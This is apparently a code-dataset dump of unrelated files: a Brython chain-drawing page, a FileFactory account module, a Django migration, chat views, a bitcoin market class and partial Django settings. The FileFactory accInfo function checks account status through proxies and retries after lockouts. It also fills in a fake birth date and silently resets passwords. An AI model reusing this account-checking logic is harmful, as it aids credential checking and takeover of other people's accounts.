x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="green")
cgo.setWorldCoords(-50, -250, 500, 500)
# 畫 C
# 上半部
# 左邊中間垂直起點, 圓心位於線段中央, y 方向再向上平移兩個鏈條圓心距單位
x1, y1 = mychain.basic_rot(0+65*2, -10+10+20*math.sin(80*deg)+20*math.sin(30*deg), 90)
# 上方轉 80 度
x2, y2 = mychain.basic_rot(x1, y1, 80)
# 上方轉 30 度
x3, y3 = mychain.basic_rot(x2, y2, 30)
# 上方水平
x4, y4 = mychain.basic_rot(x3, y3, 0)
# 下半部, 從起點開始 -80 度
x5, y5 = mychain.basic_rot(0+65*2, -10+10+20*math.sin(80*deg)+20*math.sin(30*deg), -80)
# 下斜 -30 度
x6, y6 = mychain.basic_rot(x5, y5, -30)
# 下方水平單元
x7, y7 = mychain.basic_rot(x6, y6, -0, color="green")
cgo.setWorldCoords(-55, -250, 500, 500)
# 畫 D
# 左邊四個垂直單元
x1, y1 = mychain.basic_rot(0+65*3, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
x3, y3 = mychain.basic_rot(x2, y2, 90)
x4, y4 = mychain.basic_rot(x3, y3, 90)
# 上方一個水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜 -40 度
x6, y6 = mychain.basic_rot(x5, y5, -40)
x7, y7 = mychain.basic_rot(x6, y6, -60)
# 右中垂直向下單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
# -120 度
x9, y9 = mychain.basic_rot(x8, y8, -120)
# -140
x10, y10 = mychain.basic_rot(x9, y9, -140)
# 水平接回原點
mychain.basic(x10, y10, 0+65*3, 0, color="green")
</script>
</body></html>
'''
return outstring
@bg11_40323247.route('/task47_3')
def task47_3():
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>網際 2D 繪圖</title>
<!-- IE 9: display inline SVG -->
<meta http-equiv="X-UA-Compatible" content="IE=9">
<script type="text/javascript" src="http://brython.info/src/brython_dist.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango-8v03.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango2D-6v13.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/CangoAxes-1v33.js"></script>
</head>
<body>
<script>
window.onload=function(){
brython(1);
}
</script>
<canvas id="plotarea" width="800" height="800"></canvas>
<script type="text/python">
from javascript import JSConstructor
from browser import alert
from browser import window
import math
cango = JSConstructor(window.Cango)
cobj = JSConstructor(window.Cobj)
shapedefs = window.shapeDefs
obj2d = JSConstructor(window.Obj2D)
cgo = cango("plotarea")
cgo.setWorldCoords(-250, -250, 500, 500)
# 畫軸線
cgo.drawAxes(0, 240, 0, 240, {
"strokeColor":"#aaaaaa",
"fillColor": "#aaaaaa",
"xTickInterval": 20,
"xLabelInterval": 20,
"yTickInterval": 20,
"yLabelInterval": 20})
deg = math.pi/180
# 將繪製鏈條輪廓的內容寫成 class 物件
class chain():
# 輪廓的外型設為成員變數
chamber = "M -6.8397, -1.4894 \
A 7, 7, 0, 1, 0, 6.8397, -1.4894 \
A 40, 40, 0, 0, 1, 6.8397, -18.511 \
A 7, 7, 0, 1, 0, -6.8397, -18.511 \
A 40, 40, 0, 0, 1, -6.8397, -1.4894 z"
cgoChamber = window.svgToCgoSVG(chamber)
# 利用鏈條起點與終點定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic(self, x1, y1, x2, y2, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(math.atan2(y2-y1, x2-x1)/deg+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
# 利用鏈條起點與旋轉角度定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic_rot(self, x1, y1, rot, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.rot = rot
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 根據旋轉角度, 計算 x2 與 y2
x2 = x1 + 20*math.cos(rot*deg)
y2 = y1 + 20*math.sin(rot*deg)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(rot+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
return x2, y2
# 利用 chain class 建立案例, 對應到 mychain 變數
mychain = chain()
# 畫 B
# 左邊四個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
x3, y3 = mychain.basic_rot(x2, y2, 90)
x4, y4 = mychain.basic_rot(x3, y3, 90)
# 上方一個水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜 -30 度
x6, y6 = mychain.basic_rot(x5, y5, -30)
# 右上垂直向下單元
x7, y7 = mychain.basic_rot(x6, y6, -90)
# 右斜 240 度
x8, y8 = mychain.basic_rot(x7, y7, 210)
# 中間水平
mychain.basic(x8, y8, x2, y2)
# 右下斜 -30 度
x10, y10 = mychain.basic_rot(x8, y8, -30)
# 右下垂直向下單元
x11, y11 = mychain.basic_rot(x10, y10, -90)
# 右下斜 240 度
x12, y12 = mychain.basic_rot(x11, y11, 210)
# 水平接回起點
mychain.basic(x12,y12, 0, 0, color="green")
cgo.setWorldCoords(-247.5, -350, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="green")
cgo.setWorldCoords(-55, -50, 500, 500)
# 畫 D
# 左邊四個垂直單元
x1, y1 = mychain.basic_rot(0+65*3, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
x3, y3 = mychain.basic_rot(x2, y2, 90)
x4, y4 = mychain.basic_rot(x3, y3, 90)
# 上方一個水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜 -40 度
x6, y6 = mychain.basic_rot(x5, y5, -40)
x7, y7 = mychain.basic_rot(x6, y6, -60)
# 右中垂直向下單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
# -120 度
x9, y9 = mychain.basic_rot(x8, y8, -120)
# -140
x10, y10 = mychain.basic_rot(x9, y9, -140)
# 水平接回原點
mychain.basic(x10, y10, 0+65*3, 0, color="green")
cgo.setWorldCoords(-120, -150, 500, 500)
# 畫 C
# 上半部
# 左邊中間垂直起點, 圓心位於線段中央, y 方向再向上平移兩個鏈條圓心距單位
x1, y1 = mychain.basic_rot(0+65*2, -10+10+20*math.sin(80*deg)+20*math.sin(30*deg), 90)
# 上方轉 80 度
x2, y2 = mychain.basic_rot(x1, y1, 80)
# 上方轉 30 度
x3, y3 = mychain.basic_rot(x2, y2, 30)
# 上方水平
x4, y4 = mychain.basic_rot(x3, y3, 0)
# 下半部, 從起點開始 -80 度
x5, y5 = mychain.basic_rot(0+65*2, -10+10+20*math.sin(80*deg)+20*math.sin(30*deg), -80)
# 下斜 -30 度
x6, y6 = mychain.basic_rot(x5, y5, -30)
# 下方水平單元
x7, y7 = mychain.basic_rot(x6, y6, -0, color="green")
</script>
</body></html>
'''
return outstring
| agpl-3.0 | -2,091,752,563,251,680,500 | 27.446708 | 110 | 0.607912 | false |
oczkers/gdown | gdown/modules/filefactory.py | 1 | 5668 | # -*- coding: utf-8 -*-
"""
gdown.modules.filefactory
~~~~~~~~~~~~~~~~~~~
This module contains handlers for filefactory.
"""
import re
from datetime import datetime
from dateutil import parser
from time import sleep
from ..module import browser, acc_info_template
from ..exceptions import ModuleError
def upload(username, passwd, filename):
"""Returns uploaded file url."""
r = browser()
r.post('http://www.filefactory.com/member/signin.php', {'loginEmail': username, 'loginPassword': passwd, 'Submit': 'Sign In'}) # login to get ff_membership cookie
# host = r.get('http://www.filefactory.com/servers.php?single=1').text # get best server to upload
host = 'http://upload.filefactory.com/upload.php' # always returning the same url (?)
viewhash = re.search('<viewhash>(.+)</viewhash>', r.get('http://www.filefactory.com/upload/upload_flash_begin.php?files=1').text).group(1) # get viewhash
r.post('%s/upload_flash.php?viewhash=%s' % (host, viewhash), {'Filename': filename, 'Upload': 'Submit Query'}, files={'file': open(filename, 'rb')}).text # upload
return 'http://www.filefactory.com/file/%s/n/%s' % (viewhash, filename)
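# Illustrative usage sketch (added for clarity, not part of the original
# module). The e-mail address, password and file name below are hypothetical
# placeholders, not real credentials:
#
#     url = upload('[email protected]', 'hunter2', 'backup.zip')
#     info = accInfo('[email protected]', 'hunter2')
#     print(url, info['status'])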
def accInfo(username, passwd, date_birth=False, proxy=False):
"""Returns account info."""
acc_info = acc_info_template()
r = browser(proxy)
data = {'loginEmail': username,
'loginPassword': passwd,
'Submit': 'Sign In'}
content = r.post('https://www.filefactory.com/member/signin.php', data=data).text
open('gdown.log', 'w').write(content)
# TODO: language
if r.cookies['locale'] != 'en_US.utf8':
print('language changing to en')
data = {'func': 'locale',
# 'redirect': '/account/',
'settingsLanguage': 'en_US.utf8',
'Submit': ''}
content = r.post('http://filefactory.com/account/index.php', data=data).text
open('gdown1.log', 'w').write(content)
if 'What is your date of birth?' in content:
if not date_birth:
# raise ModuleError('Birth date not set.')
acc_info['status'] = 'free'
return acc_info
print('date birth',) # DEBUG
content = r.post('https://www.filefactory.com/member/setdob.php', {'newDobMonth': '1', 'newDobDay': '1', 'newDobYear': '1970', 'Submit': 'Continue'}).text
open('gdown.log', 'w').write(content)
if 'Please Update your Password' in content:
if not date_birth:
# raise ModuleError('Password has to be updated.')
acc_info['status'] = 'free'
return acc_info
print('password resetting',) # DEBUG
content = r.post('https://www.filefactory.com/member/setpwd.php', {'dobMonth': '1', 'dobDay': '1', 'dobYear': '1970', 'newPassword': passwd, 'Submit': 'Continue'}).text
open('gdown.log', 'w').write(content)
if 'Your Date of Birth was incorrect.' in content:
print('wrong date birth',) # DEBUG
acc_info['status'] = 'free'
return acc_info
elif 'You have been signed out of your account due to a change being made to one of your core account settings. Please sign in again.' in content or 'Your password has been changed successfully' in content:
print('relogging after password reset',) # DEBUG
sleep(5)
return accInfo(username, passwd)
if 'Review Acceptable Use Policy' in content: # new policy
print('new policy')
        content = r.post('https://www.filefactory.com/member/settos.php', data={'agree': '1', 'Submit': 'I understand'}).text
if 'Account Pending Deletion' in content or 'The Email Address submitted was invalid' in content or 'The email address or password you have entered is incorrect.' in content:
acc_info['status'] = 'deleted'
return acc_info
elif 'Too Many Failed Sign In Attempts' in content:
# raise ModuleError('ip banned')
# print('ip banned') # DEBUG
sleep(30)
return accInfo(username=username, passwd=passwd, proxy=proxy)
content = r.get('https://www.filefactory.com/account/').text
if '<strong>Free Member</strong>' in content or '<strong>Kostenloses Mitglied</strong>' in content or '<strong>Membro Gratuito</strong>' in content:
acc_info['status'] = 'free'
return acc_info
elif any(i in content for i in ('The account you are trying to use has been deleted.', 'This account has been automatically suspended due to account sharing.', 'The account you have tried to sign into is pending deletion.', 'Your FileFactory Account Has Been Temporarily Suspended')):
acc_info['status'] = 'blocked'
return acc_info
elif any(i in content for i in ('The email or password you have entered is incorrect', 'The email or password wre invalid. Please try again.', 'The Email Address submitted was invalid', 'The email address or password you have entered is incorrect.')):
acc_info['status'] = 'deleted'
return acc_info
elif 'title="Premium valid until:' in content:
acc_info['status'] = 'premium'
acc_info['expire_date'] = parser.parse(re.search('title="Premium valid until: <strong>(.+?)</strong>">', content).group(1))
return acc_info
elif "Congratulations! You're a FileFactory Lifetime member. We value your loyalty and support." in content or '<strong>Lifetime</strong>' in content:
acc_info['status'] = 'premium'
acc_info['expire_date'] = datetime.max
return acc_info
else:
open('gdown.log', 'w').write(content)
raise ModuleError('Unknown error, full log in gdown.log')
| gpl-3.0 | -7,907,263,448,037,048,000 | 50.063063 | 288 | 0.638497 | false |
parksandwildlife/wastd | occurrence/migrations/0034_auto_20190507_1222.py | 1 | 2843 | # Generated by Django 2.1.7 on 2019-05-07 04:22
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
('occurrence', '0033_auto_20190506_1347'),
]
operations = [
migrations.CreateModel(
name='AnimalSex',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.SlugField(help_text='A unique, url-safe code.', max_length=500, unique=True, verbose_name='Code')),
('label', models.CharField(blank=True, help_text='A human-readable, self-explanatory label.', max_length=500, null=True, verbose_name='Label')),
('description', models.TextField(blank=True, help_text='A comprehensive description.', null=True, verbose_name='Description')),
],
options={
'ordering': ['code'],
'abstract': False,
},
),
migrations.AlterModelOptions(
name='animalobservation',
options={'verbose_name': 'Animal Observation', 'verbose_name_plural': 'Animal Observations'},
),
migrations.AlterModelOptions(
name='habitatcomposition',
options={'verbose_name': 'Habitat Composition', 'verbose_name_plural': 'Habitat Compositions'},
),
migrations.AlterModelOptions(
name='habitatcondition',
options={'verbose_name': 'Habitat Condition', 'verbose_name_plural': 'Habitat Conditions'},
),
migrations.AlterModelOptions(
name='physicalsample',
options={'verbose_name': 'Physical Sample', 'verbose_name_plural': 'Physical Samples'},
),
migrations.AlterModelOptions(
name='plantcount',
options={'verbose_name': 'Plant Count', 'verbose_name_plural': 'Plant Counts'},
),
migrations.AlterModelOptions(
name='vegetationclassification',
options={'verbose_name': 'Vegetation Classification', 'verbose_name_plural': 'Vegetation Classifications'},
),
migrations.AlterField(
model_name='areaencounter',
name='source_id',
field=models.CharField(default=uuid.UUID('b6e9dd1a-707f-11e9-a870-ecf4bb19b5fc'), help_text='The ID of the record in the original source, if available.', max_length=1000, verbose_name='Source ID'),
),
migrations.AddField(
model_name='animalobservation',
name='sex',
field=models.ForeignKey(blank=True, help_text='The sex of the primary observed animal.', null=True, on_delete=django.db.models.deletion.CASCADE, to='occurrence.AnimalSex', verbose_name='Animal Sex'),
),
]
| mit | 1,233,837,931,145,389,300 | 44.854839 | 211 | 0.610623 | false |
willre/homework | day21-22/webChat/webChat_master/views.py | 1 | 3580 | # -*- coding:utf-8 -*-
import json
import Queue
import time
from django.shortcuts import render,HttpResponseRedirect,HttpResponse
from django.contrib.auth import authenticate,login,logout
from webChat_forms.loginFrom import userLoginFrom
from django.contrib.auth.decorators import login_required
from webChat_models import models
# Create your views here.
GLOBAL_MQ = {}
def indexPage(request):
loginFrom = userLoginFrom()
return render(request,"index.html",{"loginFrom":loginFrom})
@login_required
def chatPage(request):
return render(request,"chat.html")
def loadContacts(request):
contact_dic = {}
url_path = request.path
print url_path,"asd"
contact_dic["single"] = list(request.user.userprofile.friends.select_related().values("id","name","description"))
contact_dic["group"] = list(request.user.userprofile.user_group_set.select_related().values("id","name","description"))
print json.dumps( contact_dic)
return HttpResponse(json.dumps(contact_dic))
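# Illustrative note (added for clarity, not part of the original file): the
# response above serialises the user's contacts roughly as
#     {"single": [{"id": 1, "name": "...", "description": "..."}, ...],
#      "group":  [{"id": 2, "name": "...", "description": "..."}, ...]}
# where "single" lists the user's friends and "group" the user's chat groups.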
def new_msg(request):
    # Client POSTs a new chat message to the server
if request.method=="POST":
data = json.loads(request.POST.get('data'))
send_to_user_id = data['to']
local_time = time.strftime("%Y-%m-%d %X",time.localtime(time.time()))
        data['timestamp'] = local_time  # set the timestamp
print data
if data["contact_type"] == "group":
group_obj = models.User_Group.objects.get(id=send_to_user_id)
for member in group_obj.members.select_related():
print member.id,data["from"]
if str(member.id) not in GLOBAL_MQ:
GLOBAL_MQ[str(member.id)] = Queue.Queue()
if str(member.id) != data["from"]:
GLOBAL_MQ[str(member.id)].put(data)
else:
if send_to_user_id not in GLOBAL_MQ:
GLOBAL_MQ[send_to_user_id] = Queue.Queue()
print "POST",send_to_user_id,data
GLOBAL_MQ[send_to_user_id].put(data)
return HttpResponse(local_time)
    # Client polls the server for new messages (long-poll: an empty queue blocks for up to 15 seconds below)
if request.method=="GET":
request_user_id = str(request.user.userprofile.id)
msg_lists = []
if request_user_id in GLOBAL_MQ:
stored_msg_nums = GLOBAL_MQ[request_user_id].qsize()
if stored_msg_nums ==0: #no new msgs
try:
msg = GLOBAL_MQ[request_user_id].get(timeout=15)
msg_lists.append(msg)
# msg_lists.append(GLOBAL_MQ[request_user_id].get(timeout=15))
except Exception as e:
print("err:",e)
for i in range(stored_msg_nums):
msg_lists.append(GLOBAL_MQ[request_user_id].get())
else:
GLOBAL_MQ[str(request.user.userprofile.id)] = Queue.Queue()
print "GETMsg",msg_lists
return HttpResponse(json.dumps(msg_lists))
def userLogin(request):
loginFrom = userLoginFrom()
print(request.POST)
err_msg =''
if request.method == "POST":
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(username=username,password=password)
if user is not None:
login(request,user)
return HttpResponseRedirect('/chat/#contacts')
else:
err_msg = "Wrong username or password!"
return render(request,'index.html',{"loginFrom":loginFrom,'err_msg':err_msg})
def userLogout(request):
logout(request)
return HttpResponseRedirect('/')
| gpl-2.0 | 4,381,744,721,565,426,700 | 30.90991 | 123 | 0.612931 | false |
taariq/btcmarketdata | btcdata/public_markets/market.py | 1 | 1991 | import time
import urllib.request
import urllib.error
import urllib.parse
import config
import logging
from fiatconverter import FiatConverter
class Market(object):
def __init__(self, currency):
self.name = self.__class__.__name__
self.currency = currency
self.depth_updated = 0
self.update_rate = 60
self.fc = FiatConverter()
self.fc.update()
def get_depth(self):
timediff = time.time() - self.depth_updated
if timediff > self.update_rate:
self.ask_update_depth()
timediff = time.time() - self.depth_updated
if timediff > config.market_expiration_time:
logging.warn('Market: %s order book is expired' % self.name)
self.depth = {'asks': [{'price': 0, 'amount': 0}], 'bids': [
{'price': 0, 'amount': 0}]}
return self.depth
def convert_to_usd(self):
if self.currency == "USD":
return
for direction in ("asks", "bids"):
for order in self.depth[direction]:
order["price"] = self.fc.convert(order["price"], self.currency, "USD")
def ask_update_depth(self):
try:
self.update_depth()
self.convert_to_usd()
self.depth_updated = time.time()
except (urllib.error.HTTPError, urllib.error.URLError) as e:
logging.error("HTTPError, can't update market: %s - %s" % (self.name, str(e)))
except Exception as e:
logging.error("Can't update market: %s - %s" % (self.name, str(e)))
def get_ticker(self):
depth = self.get_depth()
res = {'ask': 0, 'bid': 0}
if len(depth['asks']) > 0 and len(depth["bids"]) > 0:
res = {'ask': depth['asks'][0],
'bid': depth['bids'][0]}
return res
## Abstract methods
def update_depth(self):
pass
def buy(self, price, amount):
pass
def sell(self, price, amount):
pass
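# Illustrative sketch (added for clarity, not part of the original file): a
# minimal subclass showing how update_depth() is meant to be overridden. The
# quotes below are made-up placeholders, not data from a real exchange.
class ExampleMarket(Market):
    def update_depth(self):
        # A real implementation would fetch the exchange's order book over
        # HTTP and normalise it into price/amount dicts sorted best-first.
        self.depth = {
            'asks': [{'price': 101.0, 'amount': 1.5}],
            'bids': [{'price': 99.0, 'amount': 2.0}],
        }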
| mit | 2,434,534,309,840,194,600 | 30.603175 | 90 | 0.553993 | false |
edx/course-discovery | course_discovery/settings/base.py | 1 | 21247 | import os
import platform
from logging.handlers import SysLogHandler
from os.path import abspath, dirname, join
from sys import path
from corsheaders.defaults import default_headers as corsheaders_default_headers
here = lambda *x: join(abspath(dirname(__file__)), *x)
PROJECT_ROOT = here('..')
root = lambda *x: abspath(join(abspath(PROJECT_ROOT), *x))
path.append(root('apps'))
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('COURSE_DISCOVERY_SECRET_KEY', 'insecure-secret-key')
OPENEXCHANGERATES_API_KEY = None
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'dal',
'dal_select2',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
]
THIRD_PARTY_APPS = [
'release_util',
'rest_framework',
'rest_framework_swagger',
'social_django',
'waffle',
'sortedm2m',
'simple_history',
'guardian',
'dry_rest_permissions',
'compressor',
'django_filters',
'django_fsm',
'storages',
'django_comments',
'django_sites_extensions',
'taggit',
'taggit_autosuggest',
'taggit_serializer',
'solo',
'webpack_loader',
'parler',
# edx-drf-extensions
'csrf.apps.CsrfAppConfig', # Enables frontend apps to retrieve CSRF tokens.
'corsheaders',
'adminsortable2',
'xss_utils',
'algoliasearch_django',
'taxonomy',
'django_object_actions',
]
ALGOLIA = {
'APPLICATION_ID': '',
'API_KEY': '',
}
PROJECT_APPS = [
'course_discovery.apps.core',
'course_discovery.apps.ietf_language_tags',
'course_discovery.apps.api',
'course_discovery.apps.catalogs',
'course_discovery.apps.course_metadata',
'course_discovery.apps.edx_elasticsearch_dsl_extensions',
'course_discovery.apps.publisher',
'course_discovery.apps.publisher_comments',
]
ES_APPS = [
'elasticsearch_dsl',
'django_elasticsearch_dsl',
'django_elasticsearch_dsl_drf',
]
INSTALLED_APPS += THIRD_PARTY_APPS
INSTALLED_APPS += PROJECT_APPS
INSTALLED_APPS += ES_APPS
MIDDLEWARE = (
'corsheaders.middleware.CorsMiddleware',
'edx_django_utils.cache.middleware.RequestCacheMiddleware',
'edx_rest_framework_extensions.auth.jwt.middleware.JwtAuthCookieMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.contrib.sites.middleware.CurrentSiteMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'social_django.middleware.SocialAuthExceptionMiddleware',
'waffle.middleware.WaffleMiddleware',
'simple_history.middleware.HistoryRequestMiddleware',
'edx_django_utils.cache.middleware.TieredCacheMiddleware',
'edx_rest_framework_extensions.middleware.RequestMetricsMiddleware',
'edx_rest_framework_extensions.auth.jwt.middleware.EnsureJWTAuthSettingsMiddleware',
)
ROOT_URLCONF = 'course_discovery.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'course_discovery.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
# Set this value in the environment-specific files (e.g. local.py, production.py, test.py)
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.',
'NAME': 'discovery',
'USER': 'discov001',
'PASSWORD': 'password',
'HOST': 'localhost', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
'ATOMIC_REQUESTS': False,
},
'read_replica': {
'ENGINE': 'django.db.backends.',
'NAME': 'discovery',
'USER': 'discov001',
'PASSWORD': 'password',
'HOST': 'localhost',
'PORT': '',
'ATOMIC_REQUESTS': False,
},
}
# Internationalization
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en'
PARLER_DEFAULT_LANGUAGE_CODE = LANGUAGE_CODE
PARLER_LANGUAGES = {
1: (
{'code': LANGUAGE_CODE, },
),
'default': {
'fallbacks': [PARLER_DEFAULT_LANGUAGE_CODE],
'hide_untranslated': False,
}
}
# Parler seems to be a bit overeager with its caching of translated models,
# and so we get a large number of sets, but rarely any gets
PARLER_ENABLE_CACHING = False
# Determines whether the caching mixin in course_discovery/apps/api/cache.py is used
USE_API_CACHING = True
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
LOCALE_PATHS = (
root('conf', 'locale'),
)
# MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = root('media')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# END MEDIA CONFIGURATION
# STATIC FILE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = root('assets')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# Is this a dev environment where static files need to be explicitly added to the URL configuration?
STATIC_SERVE_EXPLICITLY = False
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
root('static'),
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
COMPRESS_PRECOMPILERS = (
('text/x-scss', 'django_libsass.SassCompiler'),
)
# Minify CSS
COMPRESS_CSS_FILTERS = [
'compressor.filters.css_default.CssAbsoluteFilter',
]
WEBPACK_LOADER = {
'DEFAULT': {
'BUNDLE_DIR_NAME': 'bundles/',
'STATS_FILE': root('..', 'webpack-stats.json'),
}
}
# TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/1.8/ref/settings/#templates
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'DIRS': (
root('templates'),
),
'OPTIONS': {
'context_processors': (
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.template.context_processors.request',
'django.contrib.messages.context_processors.messages',
'course_discovery.apps.core.context_processors.core',
),
'debug': True, # Django will only display debug pages if the global DEBUG setting is set to True.
}
},
]
# END TEMPLATE CONFIGURATION
# COOKIE CONFIGURATION
# The purpose of customizing the cookie names is to avoid conflicts when
# multiple Django services are running behind the same hostname.
# Detailed information at: https://docs.djangoproject.com/en/dev/ref/settings/
SESSION_COOKIE_NAME = 'course_discovery_sessionid'
CSRF_COOKIE_NAME = 'course_discovery_csrftoken'
LANGUAGE_COOKIE_NAME = 'course_discovery_language'
# END COOKIE CONFIGURATION
# AUTHENTICATION CONFIGURATION
LOGIN_URL = '/login/'
LOGOUT_URL = '/logout/'
AUTH_USER_MODEL = 'core.User'
AUTHENTICATION_BACKENDS = (
'auth_backends.backends.EdXOAuth2',
'django.contrib.auth.backends.ModelBackend',
'guardian.backends.ObjectPermissionBackend',
)
CORS_ALLOW_CREDENTIALS = True
CORS_ALLOW_HEADERS = corsheaders_default_headers + (
'use-jwt-cookie',
)
# CORS_ORIGIN_WHITELIST is empty by default so above is not used unless the whitelist is set elsewhere
# Guardian settings
ANONYMOUS_USER_NAME = None # Do not allow anonymous user access
GUARDIAN_MONKEY_PATCH = False # Use the mixin on the User model instead of monkey-patching.
ENABLE_AUTO_AUTH = False
AUTO_AUTH_USERNAME_PREFIX = 'auto_auth_'
SOCIAL_AUTH_STRATEGY = 'auth_backends.strategies.EdxDjangoStrategy'
# Set these to the correct values for your OAuth2 provider (e.g., devstack)
SOCIAL_AUTH_EDX_OAUTH2_KEY = "discovery-sso-key"
SOCIAL_AUTH_EDX_OAUTH2_SECRET = "discovery-sso-secret"
SOCIAL_AUTH_EDX_OAUTH2_ISSUER = "http://127.0.0.1:8000"
SOCIAL_AUTH_EDX_OAUTH2_URL_ROOT = "http://127.0.0.1:8000"
SOCIAL_AUTH_EDX_OAUTH2_LOGOUT_URL = "http://127.0.0.1:8000/logout"
BACKEND_SERVICE_EDX_OAUTH2_KEY = "discovery-backend-service-key"
BACKEND_SERVICE_EDX_OAUTH2_SECRET = "discovery-backend-service-secret"
BACKEND_SERVICE_EDX_OAUTH2_PROVIDER_URL = "http://127.0.0.1:8000/oauth2"
# OAuth request timeout: either a (connect, read) tuple or a float, in seconds.
OAUTH_API_TIMEOUT = (3.05, 1)
# Request the user's permissions in the ID token
EXTRA_SCOPE = ['permissions']
# TODO Set this to another (non-staff, ideally) path.
LOGIN_REDIRECT_URL = '/admin/'
# END AUTHENTICATION CONFIGURATION
# OPENEDX-SPECIFIC CONFIGURATION
PLATFORM_NAME = 'Your Platform Name Here'
# END OPENEDX-SPECIFIC CONFIGURATION
# Set up logging for development use (logging to stdout)
level = 'DEBUG' if DEBUG else 'INFO'
hostname = platform.node().split(".")[0]
# Use a different address for Mac OS X
syslog_address = '/var/run/syslog' if platform.system().lower() == 'darwin' else '/dev/log'
syslog_format = '[service_variant=discovery][%(name)s] %(levelname)s [{hostname} %(process)d] ' \
'[%(pathname)s:%(lineno)d] - %(message)s'.format(hostname=hostname)
LOGGING = {
